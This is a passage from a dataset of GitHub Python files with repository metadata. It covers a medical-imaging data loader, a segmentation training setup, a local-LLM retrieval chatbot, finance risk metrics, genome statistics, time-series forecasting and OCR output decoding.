num_bins=time_bins, event = self.clinical_data[\"event4\"])\n self.time_bins5 = make_time_bins(times=self.clinical_data[\"time5\"], num_bins=time_bins, event = self.clinical_data[\"event5\"])\n\n self.y1 = encode_survival(self.clinical_data[\"time1\"].values, self.clinical_data[\"event1\"].values, self.time_bins1) # single event\n self.y2 = encode_survival(self.clinical_data[\"time2\"].values, self.clinical_data[\"event2\"].values, self.time_bins2) # single event\n self.y3 = encode_survival(self.clinical_data[\"time3\"].values, 
self.clinical_data[\"event3\"].values, self.time_bins3) # single event\n self.y4 = encode_survival(self.clinical_data[\"time4\"].values, self.clinical_data[\"event4\"].values, self.time_bins4) # single event\n self.y5 = encode_survival(self.clinical_data[\"time5\"].values, self.clinical_data[\"event5\"].values, self.time_bins5) # single event\n\n\n self.cache_path = get_paths_to_patient_files(cache_dir, self.clinical_data['ID'])\n\n\n def make_data(self, path):\n\n try:\n print(path)\n df = pd.read_csv(path + '/Clinical_List_5_Outcome.csv')\n except:\n df = path\n\n clinical_data = df\n clinical_data = clinical_data.rename(columns={\"Death\": \"event1\", \"Dig2Follow\": \"time1\",\\\n \"LF\": \"event2\", \"Dig2LF\": \"time2\",\\\n \"RF\": \"event3\", \"Dig2RF\": \"time3\",\\\n \"DF\": \"event4\", \"Dig2DF\": \"time4\",\\\n \"SP\": \"event5\", \"Dig2SP\": \"time5\"})\n\n clinical_data[\"Age\"] = scale(clinical_data[\"Age\"])\n clinical_data[\"SMOKE1\"] = scale(clinical_data[\"SMOKE1\"])\n clinical_data[\"Dig2RT\"] = scale(clinical_data[\"Dig2RT\"])\n clinical_data[\"Dose\"] = scale(clinical_data[\"Dose\"])\n clinical_data[\"Fraction\"] = scale(clinical_data[\"Fraction\"])\n clinical_data[\"ECOG\"] = scale(clinical_data[\"ECOG\"])\n clinical_data[\"T\"] = scale(clinical_data[\"T\"])\n clinical_data[\"N\"] = scale(clinical_data[\"N\"])\n clinical_data[\"AJCC\"] = scale(clinical_data[\"AJCC\"])\n \n cols_to_drop = []\n\n clinical_data = clinical_data.drop(cols_to_drop, axis=1)\n \n return clinical_data\n\n def __getitem__(self, idx: int):\n \"\"\"Get an input-target pair from the dataset.\n\n The images are assumed to be preprocessed and cached.\n\n Parameters\n ----------\n idx\n The index to retrieve (note: this is not the subject ID).\n\n Returns\n -------\n tuple of torch.Tensor and int\n The input-target pair.\n \"\"\"\n \n try: # training data\n # clin_var_data = self.clinical_data.drop([\"target_binary\", 'time', 'event', 'Study ID'], axis=1) # single event\n clin_var_data = self.clinical_data.drop(['ID','time1', 'event1','time2', 'event2','time3', 'event3','time4', 'event4','time5', 'event5'], axis=1)\n except: # test data\n clin_var_data = self.clinical_data.drop(['ID'], axis=1)\n\n clin_var = clin_var_data.iloc[idx].to_numpy(dtype='float32')\n \n target = (self.y1[idx], self.y2[idx], self.y3[idx], self.y4[idx], self.y5[idx])\n \n labels = self.clinical_data.iloc[idx].to_dict()\n \n # path = self.cache_path, f\"{subject_id}_ct.nii.gz\")\n# print('hi:', path)\n \n # image = sitk.ReadImage(path)\n # if self.transform is not None:\n # image = self.transform(image)\n \n \n sample = dict()\n \n id_ = self.cache_path[idx][0].parent.stem\n\n sample['id'] = id_\n img = [self.read_data(self.cache_path[idx][i]) for i in range(self.num_of_seqs)]\n img = np.stack(img, axis=-1)\n sample['input'] = img \n \n mask = self.read_data(self.cache_path[idx][-1])\n mask = mask/255\n mask = np.expand_dims(mask, axis=3)\n sample['target_mask'] = mask\n \n if self.transforms:\n sample = self.transforms(sample)\n \n return (sample, clin_var), target, labels\n \n \n\n def __len__(self) -> int:\n \"\"\"Return the length of the dataset.\"\"\"\n return len(self.clinical_data)\n \n @staticmethod\n def read_data(path_to_nifti, return_numpy=True):\n if return_numpy:\n return sitk.GetArrayFromImage(sitk.ReadImage(str(path_to_nifti)))\n return sitk.ReadImage(str(path_to_nifti))\n # \"\"\"Read a NIfTI image. 
Return a numpy array (default) or `nibabel.nifti1.Nifti1Image` object\"\"\"\n # if return_numpy:\n # return nib.load(str(path_to_nifti)).get_fdata()\n # return nib.load(str(path_to_nifti))\n\n @staticmethod\n def to_categorical(y, num_classes):\n \"\"\" 1-hot encodes a tensor \"\"\"\n y = np.eye(num_classes+1, dtype='uint8')[y]\n return y[:,:,:,1:num_classes+1]\n","repo_name":"Meixu-Chen/MLSP","sub_path":"src/datamodules/components/hecktor_dataset.py","file_name":"hecktor_dataset.py","file_ext":"py","file_size_in_byte":7750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36534616210","text":"import torch\r\nimport torch.nn as nn\r\nimport os\r\nimport importlib\r\nimport torch.optim as optim\r\nfrom models.transform import Augmentation, BaseTransform\r\nfrom annotation.train_utils.coco_utils import CocoDetection\r\nfrom utils.utils import create_aspect_ratio_groups, GroupedBatchSampler\r\n\r\ndef weights_init(net, init_type='normal', init_gain = 0.02):\r\n def init_func(m):\r\n classname = m.__class__.__name__\r\n if hasattr(m, 'weight') and classname.find('Conv') != -1:\r\n if init_type == 'normal':\r\n torch.nn.init.normal_(m.weight.data, 0.0, init_gain)\r\n elif init_type == 'xavier':\r\n torch.nn.init.xavier_normal_(m.weight.data, gain=init_gain)\r\n elif init_type == 'kaiming':\r\n torch.nn.init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\r\n elif init_type == 'orthogonal':\r\n torch.nn.init.orthogonal_(m.weight.data, gain=init_gain)\r\n else:\r\n raise NotImplementedError('initialization method [%s] is not implemented' % init_type)\r\n elif classname.find('BatchNorm2d') != -1:\r\n torch.nn.init.normal_(m.weight.data, 1.0, 0.02)\r\n torch.nn.init.constant_(m.bias.data, 0.0)\r\n # print('initialize network with %s type' % init_type)\r\n net.apply(init_func)\r\n\r\ndef get_model(opt, train_mode=True): \r\n model = init_dt_model(opt, train_mode)\r\n criterion = init_loss(opt) \r\n return model, criterion\r\n\r\ndef init_dt_model(opt, train_mode=True):\r\n if opt.net == 'yolact':\r\n from inst_model.yolact.nets.yolact import Yolact\r\n model = Yolact(num_classes=opt.num_classes, pretrained=opt.pretrained, train_mode=train_mode)\r\n elif opt.net == 'Mask_RCNN': \r\n from inst_model.Mask_RCNN.net.backbone import resnet50_fpn_backbone\r\n from inst_model.Mask_RCNN.net.network_files import MaskRCNN\r\n backbone = resnet50_fpn_backbone(pretrain_path=\"model_data/weight/resnet50.pth\", trainable_layers=3)\r\n model = MaskRCNN(backbone, num_classes=opt.num_classes, use_pre_trained=opt.pretrained, train_mode=train_mode)\r\n\r\n if not train_mode: return model.eval()\r\n return model \r\n\r\ndef init_loss(opt):\r\n if opt.net == 'yolact':\r\n from inst_model.yolact.nets.yolact_training import Multi_Loss\r\n criterion = Multi_Loss(opt.num_classes, opt.anchors, 0.5, 0.4, 3) \r\n else:\r\n criterion = None\r\n return criterion \r\n\r\ndef get_optimizer(model, opt, optimizer_type): \r\n optimizer = {\r\n 'adam' : optim.Adam(model.parameters(), opt.Init_lr_fit, betas = (opt.momentum, 0.999), weight_decay = opt.weight_decay),\r\n 'adamw' : optim.AdamW(model.parameters(), opt.Init_lr_fit, betas = (opt.momentum, 0.999), weight_decay = opt.weight_decay),\r\n 'sgd' : optim.SGD(model.parameters(), opt.Init_lr_fit, momentum = opt.momentum, nesterov=True, weight_decay = opt.weight_decay)\r\n }[optimizer_type] \r\n return optimizer\r\n\r\ndef generate_loader(opt):\r\n if opt.exp_name == \"coco\":\r\n train_dataset = 
CocoDetection(opt.train_image_path, opt.train_coco, dataset=\"train\", net_type = opt.net, label_map = opt.COCO_LABEL_MAP, augmentation=Augmentation(opt.input_shape))\r\n val_dataset = CocoDetection(opt.val_image_path, opt.val_coco, dataset=\"val\", net_type = opt.net, label_map = opt.COCO_LABEL_MAP, augmentation=BaseTransform(opt.input_shape))\r\n if opt.net == 'yolact':\r\n from inst_model.yolact.utils.dataloader import yolact_dataset_collate \r\n dataset_collate = yolact_dataset_collate \r\n else:\r\n from inst_model.Mask_RCNN.utils.dataloader import mask_dataset_collate \r\n dataset_collate = mask_dataset_collate \r\n else:\r\n if opt.net == 'yolact':\r\n from inst_model.yolact.utils.dataloader import yolactDataset, yolact_dataset_collate \r\n train_dataset = yolactDataset(opt.train_image_path, opt.train_coco, opt.COCO_LABEL_MAP, Augmentation(opt.input_shape))\r\n val_dataset = yolactDataset(opt.val_image_path, opt.val_coco, opt.COCO_LABEL_MAP, BaseTransform(opt.input_shape))\r\n dataset_collate = yolact_dataset_collate \r\n\r\n elif opt.net == 'Mask_RCNN':\r\n from inst_model.Mask_RCNN.utils.dataloader import MaskDataset, mask_dataset_collate \r\n train_dataset = MaskDataset(opt.train_image_path, opt.train_coco, opt.COCO_LABEL_MAP, Augmentation(opt.input_shape))\r\n val_dataset = MaskDataset(opt.val_image_path, opt.val_coco, opt.COCO_LABEL_MAP, BaseTransform(opt.input_shape)) \r\n dataset_collate = mask_dataset_collate \r\n\r\n batch_size = opt.batch_size\r\n if opt.distributed:\r\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=True,)\r\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False,)\r\n batch_size = batch_size // opt.ngpus_per_node\r\n shuffle = False\r\n else:\r\n train_sampler = None\r\n val_sampler = None\r\n shuffle = True\r\n\r\n if opt.net == 'Mask_RCNN':\r\n # 是否按图片相似高宽比采样图片组成batch\r\n # 使用的话能够减小训练时所需GPU显存,默认使用\r\n if opt.aspect_ratio_group_factor >= 0:\r\n train_sampler = torch.utils.data.RandomSampler(train_dataset)\r\n # 统计所有图像高宽比例在bins区间中的位置索引\r\n group_ids = create_aspect_ratio_groups(train_dataset, k=opt.aspect_ratio_group_factor)\r\n # 每个batch图片从同一高宽比例区间中取\r\n train_batch_sampler = GroupedBatchSampler(train_sampler, group_ids, opt.batch_size)\r\n \r\n # 注意这里的collate_fn是自定义的,因为读取的数据包括image和targets,不能直接使用默认的方法合成batch\r\n batch_size = opt.batch_size\r\n nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers\r\n print('Using %g dataloader workers' % nw)\r\n\r\n if train_sampler:\r\n # 如果按照图片高宽比采样图片,dataloader中需要使用batch_sampler\r\n gen = torch.utils.data.DataLoader(train_dataset,\r\n batch_sampler=train_batch_sampler,\r\n pin_memory=True,\r\n num_workers=nw,\r\n collate_fn=dataset_collate)\r\n gen_val = torch.utils.data.DataLoader(val_dataset,\r\n batch_size=1,\r\n shuffle=False,\r\n pin_memory=True,\r\n num_workers=nw,\r\n collate_fn=dataset_collate)\r\n else:\r\n gen = torch.utils.data.DataLoader(train_dataset, shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True,\r\n drop_last=True, collate_fn=dataset_collate, sampler=None)\r\n gen_val = torch.utils.data.DataLoader(val_dataset , shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True, \r\n drop_last=True, collate_fn=dataset_collate, sampler=val_sampler) \r\n \r\n else:\r\n gen = torch.utils.data.DataLoader(train_dataset, shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True,\r\n drop_last=True, 
collate_fn=dataset_collate, sampler=train_sampler)\r\n gen_val = torch.utils.data.DataLoader(val_dataset , shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True, \r\n drop_last=True, collate_fn=dataset_collate, sampler=val_sampler) \r\n return gen, gen_val","repo_name":"Leyan529/pytorch-instance-segmentation","sub_path":"models/init_model.py","file_name":"init_model.py","file_ext":"py","file_size_in_byte":8195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17149881629","text":"from langchain.prompts import PromptTemplate\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.vectorstores import FAISS\nfrom langchain.llms import HuggingFacePipeline\nfrom langchain.llms import CTransformers\nfrom InstructorEmbedding import INSTRUCTOR\nfrom langchain.embeddings import HuggingFaceInstructEmbeddings\nfrom langchain.chains import RetrievalQA\nimport chainlit as ct\nimport asyncio\n\nimport torch\nimport transformers\nfrom transformers import AutoTokenizer, AutoModelForCausalLM, pipeline\n\nDB_FAISS_PATH = 'faiss-meditations-index'\n\ncustom_prompt_template = \"\"\"You are an AI assistant helping users to understand different meditation techniques. Your knowledge base is a book named Vigyan Bhairava Tantra. Keep your answers short and simple. If question is not clear ask user to rephrase the question. Generate sample questions for the user to ask.\n\nContext: {context}\nQuestion: {context}\n\nResponse for Questions asked.\nanswer:\n\"\"\"\n\ndef create_prompt():\n \"\"\"\n Prompt template for QA retrieval for each vectorstore\n \"\"\"\n prompt = PromptTemplate(template=custom_prompt_template, input_variables=[\"context\", 'question'])\n return prompt\n\n#retreivel Chain\ndef get_response_from_qa_chain(lm, prompt, db):\n retreival_chain = RetrievalQA.from_chain_type(llm=lm,\n chain_type=\"stuff\",\n retriever=db.as_retriever(search_kwargs={\"k\": 1}),\n return_source_documents=True,\n chain_type_kwargs={\"prompt\": prompt})\n return retreival_chain\n\n\n#Loading the local model into LLM\ndef load_llama2_llm():\n # Load the model 1lama-2-7b-chat.ggmlv3.q8_0.bin that was downloaded locally\n llm = CTransformers(\n model = \".venv/llama-2-7b-chat.ggmlv3.q8_0.bin\",\n model_type=\"llama\",\n max_new_tokens = 32000,\n temperature = 0.5\n )\n\n # model_repo = 'daryl149/llama-2-7b-chat-hf'\n\n # tokenizer = AutoTokenizer.from_pretrained(model_repo, use_fast=True)\n\n # model = AutoModelForCausalLM.from_pretrained(\n # model_repo,\n # load_in_4bit=True,\n # device_map='auto',\n # torch_dtype=torch.float16,\n # low_cpu_mem_usage=True,\n # trust_remote_code=True\n # )\n\n # max_len = 2048\n # pipe = pipeline(\n # task = \"text-generation\",\n # model = model,\n # tokenizer = tokenizer,\n # pad_token_id = tokenizer.eos_token_id,\n # max_length = max_len,\n # temperature = 0,\n # top_p = 0.95,\n # repetition_penalty = 1.15\n # )\n\n # llm = HuggingFacePipeline(pipeline = pipe)\n \n return llm\n\n\n# answering bot creation\ndef answering_bot():\n embeddings = HuggingFaceEmbeddings(model_name=\"sentence-transformers/all-MiniLM-L6-v2\",\n model_kwargs={'device': 'cpu'})\n\n vectorstore = FAISS.load_local(DB_FAISS_PATH, embeddings)\n llm = load_llama2_llm()\n message_prompt = create_prompt()\n response = get_response_from_qa_chain(llm, message_prompt, vectorstore)\n\n return response\n\n#display the result of the question asked\ndef final_result(query):\n bot_result = answering_bot()\n bot_response 
= bot_result({'query': query})\n return bot_response\n\n#chainlit code you can refer to the chainlit.io website for more details.\n@ct.on_chat_start\nasync def start():\n chain = answering_bot()\n msg = ct.Message(content=\"The bot is getting initialized, please wait!!\")\n await msg.send()\n msg.content = \"Q&A bot is ready. Ask questions on the documents indexed?\"\n await msg.update()\n ct.user_session.set(\"chain\", chain)\n\n@ct.on_message\nasync def main(message):\n chain = ct.user_session.get(\"chain\")\n cb = ct.AsyncLangchainCallbackHandler(\n stream_final_answer=True, answer_prefix_tokens=[\"FINAL\", \"ANSWER\"]\n )\n cb.answer_reached = True\n res = await chain.acall(message.content, callbacks=[cb])\n answer = res[\"result\"]\n print(answer)\n await ct.Message(content=answer).send()","repo_name":"arupnayak/llama2-faiss-chat","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26332046079","text":"\r\ndef mystery(a):\r\n i=0\r\n for i in range (len(a)-2 , 0, -1):\r\n if (a[i + 1] <= a[i - 1]):\r\n a[i] += 1\r\n \r\ndef main ():\r\n a1=42\r\n mystery(a1)\r\n print (mystery)\r\nmain()\r\n","repo_name":"daniela-mejia/Python-Net-idf19-","sub_path":"PhythonAssig/5-15-19 Assigment 12/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36700295907","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.stats as sts\nimport numpy as np\nimport seaborn as sns\n\n\n\ndef drawdown(return_series: pd.Series):\n \"\"\"\n Takes a time series of assets return\n return a dataframe with columns for \n the wealth index\n the previous peak, and \n percentage drawdown\n\n \"\"\"\n weath_index = 1000*(1+return_series).cumprod()\n previous_peak = weath_index.cummax()\n drawdown = (weath_index-previous_peak)/previous_peak\n return pd.DataFrame({\n \"wealth\": weath_index,\n \"previous_peak\": previous_peak,\n \"drawdown\": drawdown\n })\n\ndef get_ffme_return():\n \"\"\"\n load the fame-french dataset for the return of the Top and Bottom Deciles marketcap\n \"\"\"\n me_n = pd.read_csv(r\"C:\\Users\\Sumeet Maheshwari\\Desktop\\data dump\\VweKqLJfEemJ1w4LYV5qDg_2c089d97f24e49daa70b757b8337a76f_data (1)\\data\\Portfolios_Formed_on_ME_monthly_EW.csv\")\n rst = me_n[[\"Lo 10\",\"Hi 10\" ]]\n rst.columns = ['small_cap','large_cap']\n rst = rst/100\n rst.index = pd.to_datetime(rst.index, format=\"%Y%m\", errors='coerce').to_period(\"M\")\n return rst\n\ndef get_hfi_returns():\n \"\"\"\n Load and format the EDHEC Hedge Fund Index Returns\n \"\"\"\n hfi = pd.read_csv(r\"C:\\Users\\Sumeet Maheshwari\\Desktop\\data dump\\VweKqLJfEemJ1w4LYV5qDg_2c089d97f24e49daa70b757b8337a76f_data (1)\\data\\edhec-hedgefundindices.csv\",\n header=0, index_col=0, parse_dates=True)\n hfi = hfi/100\n hfi.index = hfi.index.to_period('M')\n return hfi\n\n\ndef skewness(r):\n \"\"\"\n Alternative to scipy.stats.skew()\n Computes the skewness of the supplied Series or DataFrame\n Returns a float or a Series\n \"\"\"\n demeaned_r = r - r.mean()\n # use the population standard deviation, so set dof=0\n sigma_r = r.std(ddof=0)\n exp = (demeaned_r**3).mean()\n return exp/sigma_r**3\n\ndef plot_skewness(data = pd.DataFrame):\n #data = skewness(data)\n data = pd.Series(data.skew().sort_values())\n\n # Plot skewness values\n plt.figure(figsize=(10, 6))\n 
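# Added note (not in the original): at this point data holds one skewness value\n    # per column, sorted ascending, so the bar chart below draws one bar per column.\n    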
data.plot(kind='bar', color='skyblue')\n plt.title('Skewness of Data')\n plt.xlabel('Columns')\n plt.ylabel('Skewness')\n plt.show()\n\ndef kurtosis(r):\n \"\"\"\n Alternative to scipy.stats.kurtosis()\n Computes the kurtosis of the supplied Series or DataFrame\n Returns a float or a Series\n \"\"\"\n demeaned_r = r - r.mean()\n # use the population standard deviation, so set dof=0\n sigma_r = r.std(ddof=0)\n exp = (demeaned_r**4).mean()\n return exp/sigma_r**4\n\n\ndef is_normal(r, level = 0.01):\n '''\n Applies the jarque Bera test to determine if serires is normal or not \n test is applied at the 1% level by default\n returns True if the hypothesis of normal is accepted, fales ortherwise\n '''\n statistic , p_value = sts.jarque_bera(r)\n return p_value > level\n\ndef semideviation3(r):\n \"\"\"\n Returns the semideviation aka negative semideviation of r\n r must be a Series or a DataFrame, else raises a TypeError\n \"\"\"\n excess= r-r.mean() # We demean the returns\n excess_negative = excess[excess<0] # We take only the returns below the mean\n excess_negative_square = excess_negative**2 # We square the demeaned returns below the mean\n n_negative = (excess<0).sum() # number of returns under the mean\n return (excess_negative_square.sum()/n_negative)**0.5 # semideviation\n\n\n\ndef var_historic(r, level = 5):\n \"\"\"\n VaR historic\n \"\"\"\n if isinstance(r, pd.DataFrame):\n return r.aggregate(var_historic,level = level)\n elif isinstance(r, pd.Series):\n return -np.percentile(r, level)\n else:\n raise Exception(\"Expected r to be a Series or Dataframe\")\n \n\ndef var_gaussian(r, level=5, modified = False):\n \"\"\"\n compute Z score assuming it was Guassian \n \"\"\"\n z = sts.norm.ppf(level/100)\n if modified:\n # modifiy the Z score based on observed skewness and Krutosis\n s = skewness(r)\n k = kurtosis(r)\n z = z + (\n (z**2 -1)*s/6 +(z**3 -3*z)*(k-3)/24 - (2*z**3 - 5*z)*(s**2)/36\n )\n\n return abs(r.mean() + z*r.std(ddof =0))\n\ndef plot_var_comparision(var_list: list):\n comparsion = pd.concat(var_list, axis=1)\n comparsion.columns = ['Gaussian','cornish-Fisher','historic']\n comparsion.plot.bar(title ='EDHEC Hedge Fund Indices: VaR')\n\n\ndef cvar_historic(r,level=5):\n '''\n computes the Conditional VaR of Series or DataFrame\n '''\n if isinstance(r,pd.Series):\n is_beyond = r <= -var_historic(r, level = level)\n return -r[is_beyond].mean()\n elif isinstance(r,pd.DataFrame):\n return r.aggregate(cvar_historic, level = level)\n else:\n raise Exception(\"Expected r to be a Series or Dataframe\")\n\n\n\n\n","repo_name":"sumeet0701/Portfolio_Construction_python","sub_path":"risk1.py","file_name":"risk1.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18219861493","text":"import sys\nimport csv\nimport argparse\nfrom collections import defaultdict\n\nimport numpy as np\nimport pyrodigal\nimport Bio.SeqIO\n\nimport frames\nimport code\n\ndef nucleotid_count(sequence):\n result = {nt: 0 for nt in \"ATCGN\"}\n for nt in sequence:\n result[nt] += 1\n return result\n\ndef calculate_gc_content(sequence):\n nts = nucleotid_count(sequence)\n gc_count = nts['C'] + nts['G']\n return (gc_count / len(sequence)) if sequence else 0\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='fasta_stats.py',\n description='print stats for a fasta file'\n )\n parser.add_argument('files', metavar='FILE', type=str, nargs='+', help=\"input file, default stdin\")\n args = 
parser.parse_args()\n\n tsv_writer = csv.writer(sys.stdout, delimiter=\"\\t\")\n\n for file in args.files:\n row = []\n\n print(file, file=sys.stderr)\n print(\"reading fasta from \" + file, file=sys.stderr)\n global sequences\n sequences = list(Bio.SeqIO.parse(file, \"fasta\"))\n\n # TODO extend to multi chromosomes\n if len(sequences) != 1:\n print(\"expecting exactly one sequence in fasta, found len(sequences)\")\n sys.exit(1)\n\n row.append(sequences[0].id)\n\n global sequence\n sequence = str(sequences[0].seq)\n\n print(\"finding genes\", file=sys.stderr)\n gene_finder = pyrodigal.GeneFinder()\n gene_finder.train(sequence)\n\n global genes\n genes = gene_finder.find_genes(sequence)\n\n print(\"calculating statistics\", file=sys.stderr)\n\n sequence_lengths = [g.end - g.begin + 1 for g in genes]\n\n # Whole genome length\n genome_length = len(sequence)\n print(f\"Length of Genome: {genome_length}\", file=sys.stderr)\n row.append(genome_length)\n\n # Total Length of all Genes\n genes_total_length = sum(sequence_lengths)\n print(f\"Total length of all genes: {genes_total_length} bases\", file=sys.stderr)\n row.append(genes_total_length)\n\n # Number of Genes\n genes_length = len(genes)\n print(f\"Number of genes: {genes_length}\", file=sys.stderr)\n\n # Genes Length Statistics\n min_length = min(sequence_lengths)\n max_length = max(sequence_lengths)\n quartiles_length = np.percentile(sequence_lengths, [25, 50, 75])\n print(f\"Length Min/Quartiles/Max: {min_length}, {quartiles_length[0]}, {quartiles_length[1]}, {quartiles_length[2]}, {max_length}\", file=sys.stderr)\n row += [min_length, *quartiles_length, max_length]\n\n # GC Content\n genome_gc = calculate_gc_content(sequence)\n print(f\"Whole Genome GC Conent: {genome_gc*100:0.4f}%\", file=sys.stderr)\n row.append(genome_gc)\n\n gc_contens = [ calculate_gc_content(g.sequence()) for g in genes ]\n min_gc = min(gc_contens)\n max_gc = max(gc_contens)\n quartiles_gc = np.percentile(gc_contens, [25, 50, 75])\n print(f\"Length Min/Quartiles/Max: {min_gc*100:0.4f}%, {quartiles_gc[0]*100:0.4f}%, {quartiles_gc[1]*100:0.4f}%, {quartiles_gc[2]*100:0.4f}%, {max_gc*100:0.4f}%\", file=sys.stderr)\n row += [min_gc, *quartiles_gc, max_gc]\n\n # Coding Density\n coding_density = genes_total_length / (genome_length * 2) # Count Forward and Backward Strand\n print(f\"Coding Density: {coding_density*100: 0.4}%\", file=sys.stderr)\n row.append(coding_density)\n\n # Start Codonsstart_codons\n start_codons = defaultdict(int)\n for g in genes:\n start_codons[g.start_type] += 1\n \n row.append(start_codons.get(\"ATG\", 0))\n row.append(start_codons.get(\"GTG\", 0))\n row.append(start_codons.get(\"TTG\", 0))\n row.append(start_codons.get(\"Edge\", 0))\n start_codon_count = sum(start_codons.values())\n start_codons = sorted(list(start_codons.items()), key=lambda x: -x[1])\n start_codons = \", \".join(f\"{codon}: {float(count)/start_codon_count*100:0.4f}%\" for codon, count in start_codons)\n print(f\"Start Codon Distribution: {start_codons}\", file=sys.stderr)\n\n # codon usage in genome\n codon_counts = defaultdict(int)\n for seq in frames.frames(sequence):\n for (_, codon) in seq:\n codon_counts[codon] += 1\n codon_count = sum(codon_counts.values())\n codon_counts_row = sorted(codon_counts.items(), key=lambda x: code.codon_sort_key(x[0]))\n row += [ float(c) / codon_count for _, c in codon_counts_row]\n codon_counts_print = sorted(codon_counts.items(), key=lambda x: -x[1])\n codon_counts_print = \", \".join(f\"{codon}: {float(count) / codon_count * 
100:0.4f}%\" for codon, count in codon_counts_print)\n print(f\"Codon Distribution Whole Genome: {codon_counts_print}\", file=sys.stderr)\n\n # codon usage in genes\n codon_counts = defaultdict(int)\n for gene in genes:\n for (_, codon) in frames.codons(gene.sequence()):\n codon_counts[codon] += 1\n codon_count = sum(codon_counts.values())\n codon_counts_row = sorted(codon_counts.items(), key=lambda x: code.codon_sort_key(x[0]))\n row += [ float(c) / codon_count for _, c in codon_counts_row]\n codon_counts_print = sorted(codon_counts.items(), key=lambda x: -x[1])\n codon_counts_print = \", \".join(f\"{codon}: {float(count) / codon_count * 100:0.4f}%\" for codon, count in codon_counts_print)\n print(f\"Codon Distribution Genes: {codon_counts_print}\", file=sys.stderr)\n\n tsv_writer.writerow(row)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Roxxik/jlu-bio","sub_path":"ueb04/analyse_genome.py","file_name":"analyse_genome.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"341145025","text":"from pandas import read_csv\nfrom pandas import datetime\nfrom pandas import DataFrame\nfrom matplotlib import pyplot\nfrom sklearn.metrics import mean_squared_error\nfrom matplotlib.pylab import rcParams\nfrom statsmodels.tsa.ar_model import AR\n\nrcParams['figure.figsize'] = 15, 6\n\n\ndef parser(dates):\n return datetime.strptime(dates, '%Y-%m-%d %H')\n\n\n# read the data in\nfeature_SEA = \"/Users/ramanathan/Google Drive/Arizona State University/Spring 2017/Statistical Machine Learning/Project/code/WeatherForecastingSML/dataset/feature_CIN.csv\"\nseries = read_csv(feature_SEA, header=0, parse_dates=[0], index_col=0, squeeze=True, date_parser=parser)\n\nts = series['12']\n\nX = ts\nnumber_of_days = 365\nnumber_of_hours = 365 * 24\n\ntrain, test = X[1:len(X) - number_of_hours], X[len(X) - number_of_hours:]\n\n# train autoregression\nmodel = AR(train)\nmodel_fit = model.fit()\n\nwindow = model_fit.k_ar\ncoefficient = model_fit.params\nprint('Lag: %s' % model_fit.k_ar)\nprint('Coefficients: %s' % model_fit.params)\n\n# walk forward over time steps in test\nhistory = train[len(train) - window:]\nhistory = [history[i] for i in range(len(history))]\npredictions = list()\nfor t in range(len(test)):\n length = len(history)\n lag = [history[i] for i in range(length - window, length)]\n yhat = coefficient[0]\n for d in range(window):\n yhat += coefficient[d + 1] * lag[window - d - 1]\n obs = test[t]\n predictions.append(yhat)\n history.append(obs)\n print('predicted=%f, expected=%f' % (yhat, obs))\nerror = mean_squared_error(test, predictions)\nprint('Test MSE: %.3f' % error)\n\n# plot\npyplot.plot(test)\ntitle = 'AR Model Predictions for Cincinnati'\npyplot.title(title)\npyplot.xlabel('Hourly Test Data Points (2016)')\npyplot.ylabel('Temperature (F)')\npyplot.plot(predictions, color='#ef9058')\npyplot.show()\n\n# Reference : http://machinelearningmastery.com/autoregression-models-time-series-forecasting-python/\n","repo_name":"yeskarthik/WeatherForecastingSML","sub_path":"src/arima/TimeSeriesARModeling.py","file_name":"TimeSeriesARModeling.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72844104222","text":"import sys\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport utils\n\nalphabets = '0123456789abcdefghijklmnopqrstuvwxyz'\n\ndef postpossess(bin_path):\n 
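# Added note (not in the original): the .bin file is assumed to hold raw CRNN\n    # logits. They are reshaped below to (T=26, N, C=37): 26 time steps, batch N,\n    # and 37 classes (the 36 alphabet characters plus one CTC blank). Taking the\n    # argmax over C and collapsing it with the converter is a greedy CTC decode.\n    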
converter = utils.strLabelConverter(alphabets)\n preds = np.fromfile(bin_path, dtype=np.float32)\n preds = preds.reshape(26,-1,37)\n preds = torch.from_numpy(preds)\n _, preds = preds.max(2)\n preds = preds.transpose(1, 0).contiguous().view(-1)\n preds_size = Variable(torch.IntTensor([preds.size(0)]))\n raw_pred = converter.decode(preds.data, preds_size.data, raw=True)\n sim_pred = converter.decode(preds.data, preds_size.data, raw=False)\n print('%-20s => %-20s' % (raw_pred, sim_pred))\n\nif __name__ == '__main__':\n bin_path = sys.argv[1]\n postpossess(bin_path)\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"ACL_PyTorch/built-in/cv/CRNN_meijieru_for_Pytorch/postpossess_CRNN_pytorch.py","file_name":"postpossess_CRNN_pytorch.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"24199330591","text":"import pandas as pd\nimport csv\nimport unicodedata\n\n# https://stackoverflow.com/a/29247821/6669540\ndef 